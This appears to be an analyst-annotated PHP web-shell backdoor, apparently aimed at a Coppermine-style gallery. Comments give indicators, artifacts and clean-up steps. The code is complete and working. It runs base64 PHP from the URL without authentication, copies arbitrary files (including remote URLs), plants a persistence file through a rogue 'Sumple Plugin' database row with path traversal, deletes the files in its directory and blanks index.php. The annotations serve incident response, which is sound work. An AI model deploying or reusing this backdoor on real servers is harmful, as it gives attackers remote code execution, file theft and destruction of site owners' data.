<?
// Analyst note: unauthenticated PHP backdoor. Each handler in this file is selected by
// the mere presence of a query-string key (ch, patch, eval, up); none of them checks
// $hash or any other secret before acting.
// The short open tag, eregi() and mysql_*() tie the file to legacy PHP: it needs
// short_open_tag enabled, and eregi() and ext/mysql were removed in PHP 7.

// 32-hex-character token. In this file it is substituted into the generated
// userpics/codebase.php and used as a filename pattern that exempts files from the
// directory wipe in the "patch" handler. It is a practical search string for related
// files on disk and for POST bodies carrying hash=<value>.
$hash="c64e1f646a677441adc80593e7067b34";
// "ch": emits the fixed body "okeeff0" and does nothing else. Presumably a liveness
// marker polled by a remote client (inferred; no caller is visible here). The constant
// response body is a stable indicator for proxy and web-log detection.
if(isset($_GET["ch"])){
	echo "oke";
	echo "eff0";
}
// "patch": persistence and clean-up stage. In order, it
//   1. loads the host application's config and connects to its database,
//   2. writes userpics/codebase.php (a request gate keyed on $hash),
//   3. inserts a row into the <prefix>plugins table whose path points at userpics,
//   4. deletes the other regular files in the working directory and empties index.php.
// Artifacts to look for during response: userpics/codebase.php, a plugins row named
// 'Sumple Plugin' (sic) with "../" in its path, a zero-byte index.php, and files whose
// names contain the hash.
if(isset($_GET["patch"])){
	// Presumably defines $CONFIG (it is read immediately below but never set in this
	// file). The application's own DB credentials are reused, so they should be treated
	// as exposed and rotated.
	include("../include/config.inc.php");
	mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
	mysql_select_db($CONFIG["dbname"]);
	//phpinfo();
	// Template for the file written below. The string is single-quoted, so $hash,
	// $REQUEST_URI and $_POST inside it are literal text here and only evaluated when
	// the generated file runs. The generated code ends the request with an empty body
	// when the URI matches "picEditor", or POST save==1, or POST contains a "_REQUEST"
	// key, unless POST hash equals the embedded token (loose != comparison). The effect
	// is that those request shapes stop working for anyone who lacks the token.
	// NOTE(review): $REQUEST_URI is a bare variable rather than $_SERVER[...]; whether
	// it is populated depends on the host app / PHP config and cannot be told from here.
	$codebase_str='<?php
$hash="c64e1f646a677441adc80593e7067b34";
if(eregi("picEditor", $REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
	if(($_POST["hash"]!=$hash)){
		die("");
	}
}
?>';
	
	// The search string equals the value of $hash as written in this copy, so this is a
	// no-op here; presumably the literal is a placeholder stamped per deployment (inferred).
	$codebase_str=str_replace("c64e1f646a677441adc80593e7067b34", $hash, $codebase_str);
	// Path is relative to the process working directory. The handle is neither checked
	// nor closed.
	$fp_codebase=fopen("userpics/codebase.php", "w");
	fwrite($fp_codebase, $codebase_str);
	$path=__FILE__;
	// The greedy first group backtracks to the last "/", so $ok[0] is this file's
	// directory including the trailing slash.
	preg_match("/(.*)(\/.*?)/", $path, $ok);
	$path=$ok[0];
	// Traversal string: a long "../" chain followed by the absolute directory plus
	// "userpics". Appended to any base directory it resolves back to <this dir>/userpics.
	// The loader that consumes the `path` column is not visible here; presumably it
	// includes <plugin base>/<path>/codebase.php, which would run the file written above
	// on application requests (layout resembles Coppermine Photo Gallery - inferred).
	$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
	//echo $mysql_path."\n";
	// Query is built by concatenation; the interpolated values are server-side
	// ($CONFIG, __FILE__), not request data. For clean-up, audit <prefix>plugins for
	// rows with name 'Sumple Plugin' or a path containing "../" and remove them.
	$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
	VALUES (
	'', 'Sumple Plugin', '$mysql_path', '0'
	);";
	//echo $sql;
	mysql_query($sql);
	// Any database error text is returned in the HTTP response.
	echo mysql_error();
	
	// Directory wipe: every regular file in the working directory is deleted except
	// index.php and any file whose name matches $hash (eregi = case-insensitive regex).
	// Subdirectories are left alone because of the is_file() test. Forensic impact:
	// other files that sat in this directory are gone and must be recovered from
	// backups or filesystem forensics. Presumably this script survives because its own
	// filename contains the hash (inferred).
	if ($handle = opendir('.')) {
		while (false !== ($file = readdir($handle))) { 
			if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) { 
			 	if(is_file($file)){
					unlink($file);
			 	}
			} 
		}
		// Opening with "w" and closing immediately truncates index.php to zero bytes
		// (or creates it empty), so a directory request returns a blank page.
		$fp=fopen("index.php", "w");
		fclose($fp);
		closedir($handle); 
	}
}
// "eval": base64-decodes the `eval` query parameter and executes the result as PHP with
// the web server's privileges. There is no authentication and no check against $hash.
// Because the payload travels in the URL it normally ends up in access logs; during
// incident response, decoding the logged eval= values shows what was run.
// Detection: requests to this path carrying eval=<long base64 string>.
if(isset($_GET["eval"])){
	eval(base64_decode($_GET["eval"]));
}
// "up": copies the contents of up_name to down_name. Both names come straight from the
// query string with no validation, so the handler can read any file the PHP process can
// read and create or overwrite any file it can write. file() also accepts URL wrappers
// when allow_url_fopen is enabled, so the source is not limited to local files.
// For scoping an incident, up_name/down_name pairs in the access logs enumerate which
// files were copied and where they were placed.
if(isset($_GET["up"])){
	// file() returns the source as an array of lines; implode() with a single array
	// argument joins them back into one string.
	$fp=implode(file($_GET["up_name"]));
	// The fopen() result is not checked and the handle is never closed.
	$fp_out=fopen($_GET["down_name"], "w");
	fwrite($fp_out, $fp);
}
?>